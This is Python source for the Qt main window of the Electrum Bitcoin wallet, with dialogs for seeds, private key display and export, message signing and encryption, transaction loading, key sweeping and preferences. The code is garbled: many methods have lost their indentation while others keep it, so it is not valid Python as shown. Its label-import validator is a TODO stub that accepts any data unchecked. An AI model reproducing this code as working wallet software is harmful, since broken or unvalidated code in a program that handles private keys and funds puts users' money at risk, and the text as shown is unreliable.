d = WindowModalDialog(self, _("New Contact"))
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_('New Contact') + ':'))
grid = QGridLayout()
line1 = QLineEdit()
line1.setFixedWidth(280)
line2 = QLineEdit()
line2.setFixedWidth(280)
grid.addWidget(QLabel(_("Address")), 1, 0)
grid.addWidget(line1, 1, 1)
grid.addWidget(QLabel(_("Name")), 2, 0)
grid.addWidget(line2, 2, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if d.exec_():
self.set_contact(line2.text(), line1.text())
    def show_master_public_keys(self):
        """Show a dialog with wallet metadata and its master public key(s)."""
        dialog = WindowModalDialog(self, _("Wallet Information"))
        dialog.setMinimumSize(500, 100)
        mpk_list = self.wallet.get_master_public_keys()
        vbox = QVBoxLayout()
        wallet_type = self.wallet.storage.get('wallet_type', '')
        if self.wallet.is_watching_only():
            wallet_type += ' [{}]'.format(_('watching-only'))
        seed_available = _('True') if self.wallet.has_seed() else _('False')
        keystore_types = [k.get_type_text() for k in self.wallet.get_keystores()]
        grid = QGridLayout()
        basename = os.path.basename(self.wallet.storage.path)
        grid.addWidget(QLabel(_("Wallet name")+ ':'), 0, 0)
        grid.addWidget(QLabel(basename), 0, 1)
        grid.addWidget(QLabel(_("Wallet type")+ ':'), 1, 0)
        grid.addWidget(QLabel(wallet_type), 1, 1)
        grid.addWidget(QLabel(_("Script type")+ ':'), 2, 0)
        grid.addWidget(QLabel(self.wallet.txin_type), 2, 1)
        grid.addWidget(QLabel(_("Seed available") + ':'), 3, 0)
        grid.addWidget(QLabel(str(seed_available)), 3, 1)
        if len(keystore_types) <= 1:
            # single (or no) keystore: show its type inline
            grid.addWidget(QLabel(_("Keystore type") + ':'), 4, 0)
            ks_type = str(keystore_types[0]) if keystore_types else _('No keystore')
            grid.addWidget(QLabel(ks_type), 4, 1)
        vbox.addLayout(grid)
        if self.wallet.is_deterministic():
            mpk_text = ShowQRTextEdit()
            mpk_text.setMaximumHeight(150)
            mpk_text.addCopyButton(self.app)
            def show_mpk(index):
                # display the selected master public key in the QR text box
                mpk_text.setText(mpk_list[index])
            # only show the combobox in case multiple accounts are available
            if len(mpk_list) > 1:
                def label(key):
                    if isinstance(self.wallet, Multisig_Wallet):
                        return _("cosigner") + f' {key+1} ( keystore: {keystore_types[key]} )'
                    return ''
                labels = [label(i) for i in range(len(mpk_list))]
                on_click = lambda clayout: show_mpk(clayout.selected_index())
                labels_clayout = ChoicesLayout(_("Master Public Keys"), labels, on_click)
                vbox.addLayout(labels_clayout.layout())
            else:
                vbox.addWidget(QLabel(_("Master Public Key")))
            show_mpk(0)
            vbox.addWidget(mpk_text)
        vbox.addStretch(1)
        vbox.addLayout(Buttons(CloseButton(dialog)))
        dialog.setLayout(vbox)
        dialog.exec_()
def remove_wallet(self):
if self.question('\n'.join([
_('Delete wallet file?'),
"%s"%self.wallet.storage.path,
_('If your wallet contains funds, make sure you have saved its seed.')])):
self._delete_wallet()
@protected
def _delete_wallet(self, password):
wallet_path = self.wallet.storage.path
basename = os.path.basename(wallet_path)
r = self.gui_object.daemon.delete_wallet(wallet_path)
self.close()
if r:
self.show_error(_("Wallet removed: {}").format(basename))
else:
self.show_error(_("Wallet file not found: {}").format(basename))
@protected
def show_seed_dialog(self, password):
if not self.wallet.has_seed():
self.show_message(_('This wallet has no seed'))
return
keystore = self.wallet.get_keystore()
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except BaseException as e:
self.show_error(str(e))
return
from .seed_dialog import SeedDialog
d = SeedDialog(self, seed, passphrase)
d.exec_()
def show_qrcode(self, data, title = _("QR code"), parent=None):
if not data:
return
d = QRDialog(data, parent or self, title)
d.exec_()
@protected
def show_private_key(self, address, password):
if not address:
return
try:
pk, redeem_script = self.wallet.export_private_key(address, password)
except Exception as e:
self.logger.exception('')
self.show_message(str(e))
return
xtype = bitcoin.deserialize_privkey(pk)[0]
d = WindowModalDialog(self, _("Private key"))
d.setMinimumSize(600, 150)
vbox = QVBoxLayout()
vbox.addWidget(QLabel(_("Address") + ': ' + address))
vbox.addWidget(QLabel(_("Script type") + ': ' + xtype))
vbox.addWidget(QLabel(_("Private key") + ':'))
keys_e = ShowQRTextEdit(text=pk)
keys_e.addCopyButton(self.app)
vbox.addWidget(keys_e)
if redeem_script:
vbox.addWidget(QLabel(_("Redeem Script") + ':'))
rds_e = ShowQRTextEdit(text=redeem_script)
rds_e.addCopyButton(self.app)
vbox.addWidget(rds_e)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
d.exec_()
msg_sign = _("Signing with an address actually means signing with the corresponding "
"private key, and verifying with the corresponding public key. The "
"address you have entered does not have a unique public key, so these "
"operations cannot be performed.") + '\n\n' + \
_('The operation is undefined. Not just in Electrum, but in general.')
@protected
def do_sign(self, address, message, signature, password):
address = address.text().strip()
message = message.toPlainText().strip()
if not bitcoin.is_address(address):
self.show_message(_('Invalid Bitcoin address.'))
return
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
if not self.wallet.is_mine(address):
self.show_message(_('Address not in wallet.'))
return
txin_type = self.wallet.get_txin_type(address)
if txin_type not in ['p2pkh', 'p2wpkh', 'p2wpkh-p2sh']:
self.show_message(_('Cannot sign messages with this type of address:') + \
' ' + txin_type + '\n\n' + self.msg_sign)
return
task = partial(self.wallet.sign_message, address, message, password)
def show_signed_message(sig):
try:
signature.setText(base64.b64encode(sig).decode('ascii'))
except RuntimeError:
# (signature) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=show_signed_message)
def do_verify(self, address, message, signature):
address = address.text().strip()
message = message.toPlainText().strip().encode('utf-8')
if not bitcoin.is_address(address):
self.show_message(_('Invalid Bitcoin address.'))
return
try:
# This can throw on invalid base64
sig = base64.b64decode(str(signature.toPlainText()))
verified = ecc.verify_message_with_address(address, sig, message)
except Exception as e:
verified = False
if verified:
self.show_message(_("Signature verified"))
else:
self.show_error(_("Wrong signature"))
def sign_verify_message(self, address=''):
d = WindowModalDialog(self, _('Sign/verify Message'))
d.setMinimumSize(610, 290)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
address_e = QLineEdit()
address_e.setText(address)
layout.addWidget(QLabel(_('Address')), 2, 0)
layout.addWidget(address_e, 2, 1)
signature_e = QTextEdit()
signature_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Signature')), 3, 0)
layout.addWidget(signature_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Sign"))
b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Verify"))
b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
@protected
def do_decrypt(self, message_e, pubkey_e, encrypted_e, password):
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
cyphertext = encrypted_e.toPlainText()
task = partial(self.wallet.decrypt_message, pubkey_e.text(), cyphertext, password)
def setText(text):
try:
message_e.setText(text.decode('utf-8'))
except RuntimeError:
# (message_e) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=setText)
def do_encrypt(self, message_e, pubkey_e, encrypted_e):
message = message_e.toPlainText()
message = message.encode('utf-8')
try:
public_key = ecc.ECPubkey(bfh(pubkey_e.text()))
except BaseException as e:
self.logger.exception('Invalid Public key')
self.show_warning(_('Invalid Public key'))
return
encrypted = public_key.encrypt_message(message)
encrypted_e.setText(encrypted.decode('ascii'))
def encrypt_message(self, address=''):
d = WindowModalDialog(self, _('Encrypt/decrypt Message'))
d.setMinimumSize(610, 490)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
pubkey_e = QLineEdit()
if address:
pubkey = self.wallet.get_public_key(address)
pubkey_e.setText(pubkey)
layout.addWidget(QLabel(_('Public key')), 2, 0)
layout.addWidget(pubkey_e, 2, 1)
encrypted_e = QTextEdit()
encrypted_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Encrypted')), 3, 0)
layout.addWidget(encrypted_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Encrypt"))
b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Decrypt"))
b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
def password_dialog(self, msg=None, parent=None):
from .password_dialog import PasswordDialog
parent = parent or self
d = PasswordDialog(parent, msg)
return d.run()
def tx_from_text(self, txt):
from electrum.transaction import tx_from_str
try:
tx = tx_from_str(txt)
return Transaction(tx)
except BaseException as e:
self.show_critical(_("Electrum was unable to parse your transaction") + ":\n" + str(e))
return
    def read_tx_from_qrcode(self):
        """Scan a QR code with the configured camera and handle the payload:
        either a bitcoin: payment URI or a base43-encoded raw transaction."""
        from electrum import qrscanner
        try:
            data = qrscanner.scan_barcode(self.config.get_video_device())
        except BaseException as e:
            self.show_error(str(e))
            return
        if not data:
            return
        # if the user scanned a bitcoin URI
        if str(data).startswith("bitcoin:"):
            self.pay_to_URI(data)
            return
        # else if the user scanned an offline signed tx
        try:
            data = bh2u(bitcoin.base_decode(data, length=None, base=43))
        except BaseException as e:
            self.show_error((_('Could not decode QR code')+':\n{}').format(repr(e)))
            return
        tx = self.tx_from_text(data)
        if not tx:
            return
        self.show_transaction(tx)
def read_tx_from_file(self):
fileName = self.getOpenFileName(_("Select your transaction file"), "*.txn")
if not fileName:
return
try:
with open(fileName, "r") as f:
file_content = f.read()
except (ValueError, IOError, os.error) as reason:
self.show_critical(_("Electrum was unable to open your transaction file") + "\n" + str(reason), title=_("Unable to read file or no transaction found"))
return
return self.tx_from_text(file_content)
def do_process_from_text(self):
text = text_dialog(self, _('Input raw transaction'), _("Transaction:"), _("Load transaction"))
if not text:
return
tx = self.tx_from_text(text)
if tx:
self.show_transaction(tx)
def do_process_from_file(self):
tx = self.read_tx_from_file()
if tx:
self.show_transaction(tx)
def do_process_from_txid(self):
from electrum import transaction
txid, ok = QInputDialog.getText(self, _('Lookup transaction'), _('Transaction ID') + ':')
if ok and txid:
txid = str(txid).strip()
try:
raw_tx = self.network.run_from_another_thread(
self.network.get_transaction(txid, timeout=10))
except Exception as e:
self.show_message(_("Error getting transaction from network") + ":\n" + str(e))
return
tx = transaction.Transaction(raw_tx)
self.show_transaction(tx)
    @protected
    def export_privkeys_dialog(self, password):
        """Export all wallet private keys to a CSV or JSON file.

        Keys are derived on a background thread (one per address) while the
        dialog shows progress; the actual file export happens after the
        dialog is accepted.
        """
        if self.wallet.is_watching_only():
            self.show_message(_("This is a watching-only wallet"))
            return
        if isinstance(self.wallet, Multisig_Wallet):
            self.show_message(_('WARNING: This is a multi-signature wallet.') + '\n' +
                              _('It cannot be "backed up" by simply exporting these private keys.'))
        d = WindowModalDialog(self, _('Private keys'))
        d.setMinimumSize(980, 300)
        vbox = QVBoxLayout(d)
        msg = "%s\n%s\n%s" % (_("WARNING: ALL your private keys are secret."),
                              _("Exposing a single private key can compromise your entire wallet!"),
                              _("In particular, DO NOT use 'redeem private key' services proposed by third parties."))
        vbox.addWidget(QLabel(msg))
        e = QTextEdit()
        e.setReadOnly(True)
        vbox.addWidget(e)
        defaultname = 'electrum-private-keys.csv'
        select_msg = _('Select file to export your private keys to')
        hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
        vbox.addLayout(hbox)
        b = OkButton(d, _('Export'))
        b.setEnabled(False)  # enabled once all keys have been derived
        vbox.addLayout(Buttons(CancelButton(d), b))
        private_keys = {}
        addresses = self.wallet.get_addresses()
        done = False
        cancelled = False
        def privkeys_thread():
            # background worker: derive one key per address, signalling progress
            for addr in addresses:
                time.sleep(0.1)
                if done or cancelled:
                    break
                privkey = self.wallet.export_private_key(addr, password)[0]
                private_keys[addr] = privkey
                self.computing_privkeys_signal.emit()
            if not cancelled:
                self.computing_privkeys_signal.disconnect()
                self.show_privkeys_signal.emit()
        def show_privkeys():
            # all keys derived: show them and enable the Export button
            s = "\n".join( map( lambda x: x[0] + "\t"+ x[1], private_keys.items()))
            e.setText(s)
            b.setEnabled(True)
            self.show_privkeys_signal.disconnect()
            nonlocal done
            done = True
        def on_dialog_closed(*args):
            nonlocal done
            nonlocal cancelled
            if not done:
                # dialog closed before derivation finished: stop the worker
                cancelled = True
                self.computing_privkeys_signal.disconnect()
                self.show_privkeys_signal.disconnect()
        self.computing_privkeys_signal.connect(lambda: e.setText("Please wait... %d/%d"%(len(private_keys),len(addresses))))
        self.show_privkeys_signal.connect(show_privkeys)
        d.finished.connect(on_dialog_closed)
        threading.Thread(target=privkeys_thread).start()
        if not d.exec_():
            done = True
            return
        filename = filename_e.text()
        if not filename:
            return
        try:
            self.do_export_privkeys(filename, private_keys, csv_button.isChecked())
        except (IOError, os.error) as reason:
            txt = "\n".join([
                _("Electrum was unable to produce a private key-export."),
                str(reason)
            ])
            self.show_critical(txt, title=_("Unable to create csv"))
        except Exception as e:
            self.show_message(str(e))
            return
        self.show_message(_("Private keys exported."))
def do_export_privkeys(self, fileName, pklist, is_csv):
with open(fileName, "w+") as f:
if is_csv:
transaction = csv.writer(f)
transaction.writerow(["address", "private_key"])
for addr, pk in pklist.items():
transaction.writerow(["%34s"%addr,pk])
else:
f.write(json.dumps(pklist, indent = 4))
    def do_import_labels(self):
        """Import wallet labels from a user-selected file via the import-meta flow."""
        def import_labels(path):
            def _validate(data):
                return data  # TODO: validate imported label data
            def import_labels_assign(data):
                for key, value in data.items():
                    self.wallet.set_label(key, value)
            import_meta(path, _validate, import_labels_assign)
        def on_import():
            # labels changed: schedule a GUI refresh
            self.need_update.set()
        import_meta_gui(self, _('labels'), import_labels, on_import)
    def do_export_labels(self):
        """Export all wallet labels to a user-selected file via the export-meta flow."""
        def export_labels(filename):
            export_meta(self.wallet.labels, filename)
        export_meta_gui(self, _('labels'), export_labels)
    def sweep_key_dialog(self):
        """Sweep funds from externally-supplied private keys to a wallet address.

        Shows a dialog with a key-entry box and a destination address field,
        then pre-fills the Send tab with a max-value transaction using the
        swept coins.
        """
        d = WindowModalDialog(self, title=_('Sweep private keys'))
        d.setMinimumSize(600, 300)
        vbox = QVBoxLayout(d)
        hbox_top = QHBoxLayout()
        hbox_top.addWidget(QLabel(_("Enter private keys:")))
        hbox_top.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
        vbox.addLayout(hbox_top)
        keys_e = ScanQRTextEdit(allow_multi=True)
        keys_e.setTabChangesFocus(True)
        vbox.addWidget(keys_e)
        addresses = self.wallet.get_unused_addresses()
        if not addresses:
            # fall back for wallet types without unused-address tracking
            try:
                addresses = self.wallet.get_receiving_addresses()
            except AttributeError:
                addresses = self.wallet.get_addresses()
        h, address_e = address_field(addresses)
        vbox.addLayout(h)
        vbox.addStretch(1)
        button = OkButton(d, _('Sweep'))
        vbox.addLayout(Buttons(CancelButton(d), button))
        button.setEnabled(False)
        def get_address():
            # destination address, or None if the field is not a valid address
            addr = str(address_e.text()).strip()
            if bitcoin.is_address(addr):
                return addr
        def get_pk(*, raise_on_error=False):
            text = str(keys_e.toPlainText())
            return keystore.get_private_keys(text, raise_on_error=raise_on_error)
        def on_edit():
            # enable Sweep only when both keys and destination are valid
            valid_privkeys = False
            try:
                valid_privkeys = get_pk(raise_on_error=True) is not None
            except Exception as e:
                button.setToolTip(f'{_("Error")}: {str(e)}')
            else:
                button.setToolTip('')
            button.setEnabled(get_address() is not None and valid_privkeys)
        on_address = lambda text: address_e.setStyleSheet((ColorScheme.DEFAULT if get_address() else ColorScheme.RED).as_stylesheet())
        keys_e.textChanged.connect(on_edit)
        address_e.textChanged.connect(on_edit)
        address_e.textChanged.connect(on_address)
        on_address(str(address_e.text()))
        if not d.exec_():
            return
        # user pressed "sweep"
        addr = get_address()
        try:
            self.wallet.check_address(addr)
        except InternalAddressCorruption as e:
            self.show_error(str(e))
            raise
        try:
            coins, keypairs = sweep_preparations(get_pk(), self.network)
        except Exception as e:  # FIXME too broad...
            self.show_message(str(e))
            return
        self.do_clear()
        self.tx_external_keypairs = keypairs
        self.spend_coins(coins)
        self.payto_e.setText(addr)
        self.spend_max()
        self.payto_e.setFrozen(True)
        self.amount_e.setFrozen(True)
        self.warn_if_watching_only()
    def _do_import(self, title, header_layout, func):
        """Common driver for bulk imports.

        Shows a multi-line text dialog, splits the input on whitespace, feeds
        the entries to *func* (which returns (good_inputs, bad_inputs)), and
        reports both result lists to the user (truncated at ten entries each).
        """
        text = text_dialog(self, title, header_layout, _('Import'), allow_multi=True)
        if not text:
            return
        keys = str(text).split()
        good_inputs, bad_inputs = func(keys)
        if good_inputs:
            msg = '\n'.join(good_inputs[:10])
            if len(good_inputs) > 10: msg += '\n...'
            self.show_message(_("The following addresses were added")
                              + f' ({len(good_inputs)}):\n' + msg)
        if bad_inputs:
            # bad_inputs is a list of (key, error_message) pairs
            msg = "\n".join(f"{key[:10]}... ({msg})" for key, msg in bad_inputs[:10])
            if len(bad_inputs) > 10: msg += '\n...'
            self.show_error(_("The following inputs could not be imported")
                            + f' ({len(bad_inputs)}):\n' + msg)
        self.address_list.update()
        self.history_list.update()
def import_addresses(self):
if not self.wallet.can_import_address():
return
title, msg = _('Import addresses'), _("Enter addresses")+':'
self._do_import(title, msg, self.wallet.import_addresses)
@protected
def do_import_privkey(self, password):
if not self.wallet.can_import_privkey():
return
title = _('Import private keys')
header_layout = QHBoxLayout()
header_layout.addWidget(QLabel(_("Enter private keys")+':'))
header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
self._do_import(title, header_layout, lambda x: self.wallet.import_private_keys(x, password))
    def update_fiat(self):
        """Show or hide the fiat amount fields and refresh views after the
        exchange-rate (fx) setting changes."""
        b = self.fx and self.fx.is_enabled()
        self.fiat_send_e.setVisible(b)
        self.fiat_receive_e.setVisible(b)
        self.history_list.update()
        self.address_list.refresh_headers()
        self.address_list.update()
        self.update_status()
def settings_dialog(self):
self.need_restart = False
d = WindowModalDialog(self, _('Preferences'))
vbox = QVBoxLayout()
tabs = QTabWidget()
gui_widgets = []
fee_widgets = []
tx_widgets = []
id_widgets = []
# language
lang_help = _('Select which language is used in the GUI (after restart).')
lang_label = HelpLabel(_('Language') + ':', lang_help)
lang_combo = QComboBox()
from electrum.i18n import languages
lang_combo.addItems(list(languages.values()))
lang_keys = list(languages.keys())
lang_cur_setting = self.config.get("language", '')
try:
index = lang_keys.index(lang_cur_setting)
except ValueError: # not in list
index = 0
lang_combo.setCurrentIndex(index)
if not self.config.is_modifiable('language'):
for w in [lang_combo, lang_label]: w.setEnabled(False)
def on_lang(x):
lang_request = list(languages.keys())[lang_combo.currentIndex()]
if lang_request != self.config.get('language'):
self.config.set_key("language", lang_request, True)
self.need_restart = True
lang_combo.currentIndexChanged.connect(on_lang)
gui_widgets.append((lang_label, lang_combo))
nz_help = _('Number of zeros displayed after the decimal point. For example, if this is set to 2, "1." will be displayed as "1.00"')
nz_label = HelpLabel(_('Zeros after decimal point') + ':', nz_help)
nz = QSpinBox()
nz.setMinimum(0)
nz.setMaximum(self.decimal_point)
nz.setValue(self.num_zeros)
if not self.config.is_modifiable('num_zeros'):
for w in [nz, nz_label]: w.setEnabled(False)
def on_nz():
value = nz.value()
if self.num_zeros != value:
self.num_zeros = value
self.config.set_key('num_zeros', value, True)
self.history_list.update()
self.address_list.update()
nz.valueChanged.connect(on_nz)
gui_widgets.append((nz_label, nz))
msg = '\n'.join([
_('Time based: fee rate is based on average confirmation time estimates'),
_('Mempool based: fee rate is targeting a depth in the memory pool')
]
)
fee_type_label = HelpLabel(_('Fee estimation') + ':', msg)
fee_type_combo = QComboBox()
fee_type_combo.addItems([_('Static'), _('ETA'), _('Mempool')])
fee_type_combo.setCurrentIndex((2 if self.config.use_mempool_fees() else 1) if self.config.is_dynfee() else 0)
def on_fee_type(x):
self.config.set_key('mempool_fees', x==2)
self.config.set_key('dynamic_fees', x>0)
self.fee_slider.update()
fee_type_combo.currentIndexChanged.connect(on_fee_type)
fee_widgets.append((fee_type_label, fee_type_combo))
feebox_cb = QCheckBox(_('Edit fees manually'))
feebox_cb.setChecked(self.config.get('show_fee', False))
feebox_cb.setToolTip(_("Show fee edit box in send tab."))
def on_feebox(x):
self.config.set_key('show_fee', x == Qt.Checked)
self.fee_adv_controls.setVisible(bool(x))
feebox_cb.stateChanged.connect(on_feebox)
fee_widgets.append((feebox_cb, None))
use_rbf = self.config.get('use_rbf', True)
use_rbf_cb = QCheckBox(_('Use Replace-By-Fee'))
use_rbf_cb.setChecked(use_rbf)
use_rbf_cb.setToolTip(
_('If you check this box, your transactions will be marked as non-final,') + '\n' + \
_('and you will have the possibility, while they are unconfirmed, to replace them with transactions that pay higher fees.') + '\n' + \
_('Note that some merchants do not accept non-final transactions until they are confirmed.'))
def on_use_rbf(x):
self.config.set_key('use_rbf', bool(x))
batch_rbf_cb.setEnabled(bool(x))
use_rbf_cb.stateChanged.connect(on_use_rbf)
fee_widgets.append((use_rbf_cb, None))
batch_rbf_cb = QCheckBox(_('Batch RBF transactions'))
batch_rbf_cb.setChecked(self.config.get('batch_rbf', False))
batch_rbf_cb.setEnabled(use_rbf)
batch_rbf_cb.setToolTip(
_('If you check this box, your unconfirmed transactions will be consolidated into a single transaction.') + '\n' + \
_('This will save fees.'))
def on_batch_rbf(x):
self.config.set_key('batch_rbf', bool(x))
batch_rbf_cb.stateChanged.connect(on_batch_rbf)
fee_widgets.append((batch_rbf_cb, None))
msg = _('OpenAlias record, used to receive coins and to sign payment requests.') + '\n\n'\
+ _('The following alias providers are available:') + '\n'\
+ '\n'.join(['https://cryptoname.co/', 'http://xmr.link']) + '\n\n'\
+ 'For more information, see https://openalias.org'
alias_label = HelpLabel(_('OpenAlias') + ':', msg)
alias = self.config.get('alias','')
alias_e = QLineEdit(alias)
def set_alias_color():
if not self.config.get('alias'):
alias_e.setStyleSheet("")
return
if self.alias_info:
alias_addr, alias_name, validated = self.alias_info
alias_e.setStyleSheet((ColorScheme.GREEN if validated else ColorScheme.RED).as_stylesheet(True))
else:
alias_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True))
def on_alias_edit():
alias_e.setStyleSheet("")
alias = str(alias_e.text())
self.config.set_key('alias', alias, True)
if alias:
self.fetch_alias()
set_alias_color()
self.alias_received_signal.connect(set_alias_color)
alias_e.editingFinished.connect(on_alias_edit)
id_widgets.append((alias_label, alias_e))
# SSL certificate
msg = ' '.join([
_('SSL certificate used to sign payment requests.'),
_('Use setconfig to set ssl_chain and ssl_privkey.'),
])
if self.config.get('ssl_privkey') or self.config.get('ssl_chain'):
try:
SSL_identity = paymentrequest.check_ssl_config(self.config)
SSL_error = None
except BaseException as e:
SSL_identity = "error"
SSL_error = str(e)
else:
SSL_identity = ""
SSL_error = None
SSL_id_label = HelpLabel(_('SSL certificate') + ':', msg)
SSL_id_e = QLineEdit(SSL_identity)
SSL_id_e.setStyleSheet((ColorScheme.RED if SSL_error else ColorScheme.GREEN).as_stylesheet(True) if SSL_identity else '')
if SSL_error:
SSL_id_e.setToolTip(SSL_error)
SSL_id_e.setReadOnly(True)
id_widgets.append((SSL_id_label, SSL_id_e))
units = base_units_list
msg = (_('Base unit of your wallet.')
+ '\n1 BTC = 1000 mBTC. 1 mBTC = 1000 bits. 1 bit = 100 sat.\n'
+ _('This setting affects the Send tab, and all balance related fields.'))
unit_label = HelpLabel(_('Base unit') + ':', msg)
unit_combo = QComboBox()
unit_combo.addItems(units)
unit_combo.setCurrentIndex(units.index(self.base_unit()))
def on_unit(x, nz):
unit_result = units[unit_combo.currentIndex()]
if self.base_unit() == unit_result:
return
edits = self.amount_e, self.fee_e, self.receive_amount_e
amounts = [edit.get_amount() for edit in edits]
self.decimal_point = base_unit_name_to_decimal_point(unit_result)
self.config.set_key('decimal_point', self.decimal_point, True)
nz.setMaximum(self.decimal_point)
self.history_list.update()
self.request_list.update()
self.address_list.update()
for edit, amount in zip(edits, amounts):
edit.setAmount(amount)
self.update_status()
unit_combo.currentIndexChanged.connect(lambda x: on_unit(x, nz))
gui_widgets.append((unit_label, unit_combo))
block_explorers = sorted(util.block_explorer_info().keys())
msg = _('Choose which online block explorer to use for functions that open a web browser')
block_ex_label = HelpLabel(_('Online Block Explorer') + ':', msg)
block_ex_combo = QComboBox()
block_ex_combo.addItems(block_explorers)
block_ex_combo.setCurrentIndex(block_ex_combo.findText(util.block_explorer(self.config)))
def on_be(x):
be_result = block_explorers[block_ex_combo.currentIndex()]
self.config.set_key('block_explorer', be_result, True)
block_ex_combo.currentIndexChanged.connect(on_be)
gui_widgets.append((block_ex_label, block_ex_combo))
from electrum import qrscanner
system_cameras = qrscanner._find_system_cameras()
qr_combo = QComboBox()
qr_combo.addItem("Default","default")
for camera, device in system_cameras.items():
qr_combo.addItem(camera, device)
#combo.addItem("Manually specify a device", config.get("video_device"))
index = qr_combo.findData(self.config.get("video_device"))
qr_combo.setCurrentIndex(index)
msg = _("Install the zbar package to enable this.")
qr_label = HelpLabel(_('Video Device') + ':', msg)
qr_combo.setEnabled(qrscanner.libzbar is not None)
on_video_device = lambda x: self.config.set_key("video_device", qr_combo.itemData(x), True)
qr_combo.currentIndexChanged.connect(on_video_device)
gui_widgets.append((qr_label, qr_combo))
colortheme_combo = QComboBox()
colortheme_combo.addItem(_('Light'), 'default')
colortheme_combo.addItem(_('Dark'), 'dark')
index = colortheme_combo.findData(self.config.get('qt_gui_color_theme', 'default'))
colortheme_combo.setCurrentIndex(index)
colortheme_label = QLabel(_('Color theme') + ':')
def on_colortheme(x):
self.config.set_key('qt_gui_color_theme', colortheme_combo.itemData(x), True)
self.need_restart = True
colortheme_combo.currentIndexChanged.connect(on_colortheme)
gui_widgets.append((colortheme_label, colortheme_combo))
updatecheck_cb = QCheckBox(_("Automatically check for software updates"))
updatecheck_cb.setChecked(self.config.get('check_updates', False))
def on_set_updatecheck(v):
self.config.set_key('check_updates', v == Qt.Checked, save=True)
updatecheck_cb.stateChanged.connect(on_set_updatecheck)
gui_widgets.append((updatecheck_cb, None))
usechange_cb = QCheckBox(_('Use change addresses'))
usechange_cb.setChecked(self.wallet.use_change)
if not self.config.is_modifiable('use_change'): usechange_cb.setEnabled(False)
def on_usechange(x):
usechange_result = x == Qt.Checked
if self.wallet.use_change != usechange_result:
self.wallet.use_change = usechange_result
self.wallet.storage.put('use_change', self.wallet.use_change)
multiple_cb.setEnabled(self.wallet.use_change)
usechange_cb.stateChanged.connect(on_usechange)
usechange_cb.setToolTip(_('Using change addresses makes it more difficult for other people to track your transactions.'))
tx_widgets.append((usechange_cb, None))
def on_multiple(x):
multiple = x == Qt.Checked
if self.wallet.multiple_change != multiple:
self.wallet.multiple_change = multiple
self.wallet.storage.put('multiple_change', multiple)
multiple_change = self.wallet.multiple_change
multiple_cb = QCheckBox(_('Use multiple change addresses'))
multiple_cb.setEnabled(self.wallet.use_change)
multiple_cb.setToolTip('\n'.join([
_('In some cases, use up to 3 change addresses in order to break '
'up large coin amounts and obfuscate the recipient address.'),
_('This may result in higher transactions fees.')
]))
multiple_cb.setChecked(multiple_change)
multiple_cb.stateChanged.connect(on_multiple)
tx_widgets.append((multiple_cb, None))
def fmt_docs(key, klass):
lines = [ln.lstrip(" ") for ln in klass.__doc__.split("\n")]
return '\n'.join([key, "", " ".join(lines)])
choosers = sorted(coinchooser.COIN_CHOOSERS.keys())
if len(choosers) > 1:
chooser_name = coinchooser.get_name(self.config)
msg = _('Choose coin (UTXO) selection method. The following are available:\n\n')
msg += '\n\n'.join(fmt_docs(*item) for item in coinchooser.COIN_CHOOSERS.items())
chooser_label = HelpLabel(_('Coin selection') + ':', msg)
chooser_combo = QComboBox()
chooser_combo.addItems(choosers)
i = choosers.index(chooser_name) if chooser_name in choosers else 0
chooser_combo.setCurrentIndex(i)
def on_chooser(x):
chooser_name = choosers[chooser_combo.currentIndex()]
self.config.set_key('coin_chooser', chooser_name)
chooser_combo.currentIndexChanged.connect(on_chooser)
tx_widgets.append((chooser_label, chooser_combo))
def on_unconf(x):
self.config.set_key('confirmed_only', bool(x))
conf_only = self.config.get('confirmed_only', False)
unconf_cb = QCheckBox(_('Spend only confirmed coins'))
unconf_cb.setToolTip(_('Spend only confirmed inputs.'))
unconf_cb.setChecked(conf_only)
unconf_cb.stateChanged.connect(on_unconf)
tx_widgets.append((unconf_cb, None))
def on_outrounding(x):
self.config.set_key('coin_chooser_output_rounding', bool(x))
enable_outrounding = self.config.get('coin_chooser_output_rounding', False)
outrounding_cb = QCheckBox(_('Enable output value rounding'))
outrounding_cb.setToolTip(
_('Set the value of the change output so that it has similar precision to the other outputs.') + '\n' +
_('This might improve your privacy somewhat.') + '\n' +
_('If enabled, at most 100 satoshis might be lost due to this, per transaction.'))
outrounding_cb.setChecked(enable_outrounding)
outrounding_cb.stateChanged.connect(on_outrounding)
tx_widgets.append((outrounding_cb, None))
# Fiat Currency
hist_checkbox = QCheckBox()
hist_capgains_checkbox = QCheckBox()
fiat_address_checkbox = QCheckBox()
